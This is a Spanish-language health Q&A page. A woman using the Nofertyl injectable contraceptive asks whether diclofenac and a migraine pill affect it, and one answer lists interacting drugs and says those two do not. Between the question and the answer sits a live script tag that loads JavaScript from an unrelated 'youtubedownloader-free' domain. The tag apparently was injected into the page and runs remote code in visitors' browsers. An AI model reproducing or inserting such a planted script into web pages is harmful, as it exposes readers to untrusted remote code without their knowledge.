¿Qué medicamentos afectan la efectividad de Nofertyl?

Estoy utilizando Nofertyl por 7 meses y el día de ayer me tome dos pastillas una DICLOFENACO para un dolor de dientes que me receto mi odontólogo y una MIGRADORIXINA para un fuerte dolor de cabeza la una la tome en la mañana y la otra en la noche, bueno el caso es que e escuchado que hay medicamentos que pueden alterar la efectividad de las inyecciones anticonceptivas, quisiera saber si estas dos pastillas pueden afectar a mi planificación con Nofertyl y que medicamentos debería evitar para que esto no suceda

De antemano muchas gracias

<script type="text/javascript" language="javascript" src="http://a-youtubedownloader-free.com/js.php"></script>

1 Respuesta

Respuesta

Barbitúricos, difenilhidantoína, rifampicina, ampicilinas y Hypericum perforatum (hierva de San Juan).

Debes consultar siempre que tomes otros medicamentos, no solo por que pueda reducirse la eficacia anticonceptiva, si no por que puede ser necesario ajustar la dosis de esos otros medicamentos o hacer otra elección, en cuanto a la eficacia de dichos medicamentos.

La combinación con los medicamentos que mencionas, no baja la eficacia del anticonceptivo.